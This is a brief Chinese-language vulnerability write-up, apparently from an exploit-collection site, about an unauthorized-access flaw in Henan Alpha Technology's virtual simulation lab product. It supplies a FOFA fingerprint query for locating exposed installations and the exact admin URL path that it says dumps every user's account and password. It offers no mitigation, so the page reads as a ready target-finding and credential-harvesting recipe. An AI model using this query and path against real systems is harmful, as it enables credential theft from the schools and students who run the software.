# 阿尔法科技 虚拟仿真实验室 未授权访问漏洞
## 漏洞描述
阿尔法科技 虚拟仿真实验室 存在未授权访问漏洞,通过访问构造的Url可以获取敏感信息
## 漏洞影响
> [!NOTE]
>
> 虚拟仿真实验室
## FOFA
> [!NOTE]
>
> body=”河南阿尔法科技有限公司”
## 漏洞复现
未授权的Url为
“`
/admin/student/studentlist.html?page=1
“`
成功获取所有用户的账号密码信息
## 参考文章
http://www.0dayhack.net/index.php/1702/
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容